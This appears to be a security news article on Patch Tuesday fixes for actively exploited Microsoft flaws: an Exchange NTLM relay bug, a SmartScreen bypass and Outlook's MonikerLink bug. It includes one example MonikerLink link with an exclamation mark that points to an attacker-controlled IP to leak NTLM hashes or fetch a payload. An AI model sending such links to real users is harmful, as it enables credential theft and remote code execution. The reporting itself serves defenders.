Microsoft on Wednesday acknowledged that a recently disclosed critical security flaw in Exchange Server was being actively exploited in the wild, a day after releasing fixes for the vulnerability as part of its Patch Tuesday updates.
Tracked as CVE-2024-21410 (CVSS Score: 9.8), the issue was described as a case of privilege escalation impacting Exchange Server.
“An attacker could target an NTLM client such as Outlook with an NTLM credential leak vulnerability,” the company said in an advisory published this week.
“The leaked credentials can then be forwarded to the Exchange server to gain privileges as the victim’s client and perform operations on the Exchange server on behalf of the victim.”
Successful exploitation of the flaw could allow an attacker to forward a user’s leaked Net-NTLMv2 hash to a susceptible Exchange server and authenticate themselves as the user, Redmond added.
The tech giant, in an update to its bulletin, revised its exploitability assessment to “Exploitation Detected,” noting that Extended Protection for Authentication (EPA) is now enabled by default with Exchange Server 2019 Cumulative Update 14 (CU14). EPA blunts the relay because it binds the NTLM authentication to the TLS channel (channel binding), so a hash relayed from a different connection is rejected; servers on earlier cumulative updates do not get this protection until EPA is turned on, which Microsoft provides the ExchangeExtendedProtectionManagement.ps1 script for.
Details about the nature of the exploitation and the identity of threat actors who may be abusing the flaw are currently unknown. However, Russian state-affiliated hacking teams like APT28 (also known as Forest Blizzard) have a history of exploiting flaws in Microsoft Outlook to mount NTLM relay attacks.
Earlier this month, Trend Micro implicated the adversary in NTLM relay attacks against high-value entities since at least April 2022. The intrusions targeted foreign affairs, energy, defense, and transportation organizations, as well as those involved in labor, social welfare, finance, parenthood, and local city councils.
CVE-2024-21410 joins two other Windows flaws – CVE-2024-21351 (CVSS score: 7.6) and CVE-2024-21412 (CVSS score: 8.1) – which were patched by Microsoft this week and have been actively weaponized in real-world attacks.
The exploitation of CVE-2024-21412, a bug that allows Windows SmartScreen protections to be bypassed, has been attributed to an advanced persistent threat called Water Hydra (also known as DarkCasino), which previously exploited zero-days in WinRAR to distribute the DarkMe Trojan.
“The group used Internet shortcuts disguised as a JPEG image that, when selected by the user, allow the threat actor to exploit CVE-2024-21412,” Trend Micro said. “The group can then bypass Microsoft Defender SmartScreen and fully compromise the Windows host as part of its attack chain.”
Microsoft’s Patch Tuesday update also addresses CVE-2024-21413, another critical flaw affecting Outlook email software that could lead to remote code execution by trivially bypassing security measures such as Protected View.
Codenamed MonikerLink by Check Point, the issue “enables broad and severe impact, ranging from information leakage of local NTLM credentials to arbitrary code execution.”
The vulnerability stems from Outlook's incorrect parsing of “file://” hyperlinks: appending an exclamation mark to a URL that points to an attacker-controlled server causes the link to sidestep Outlook's security check for remote file links and be handed to the Windows Component Object Model (COM) moniker parser, fetching an arbitrary payload such as “file:///\\10.10.111.111\test\test.rtf!something”.
“The bug not only allows leakage of local NTLM information, but may also allow remote code execution and more as an attack vector,” the cybersecurity firm said. “It could also bypass Office Protected View when used as an attack vector to target other Office applications.”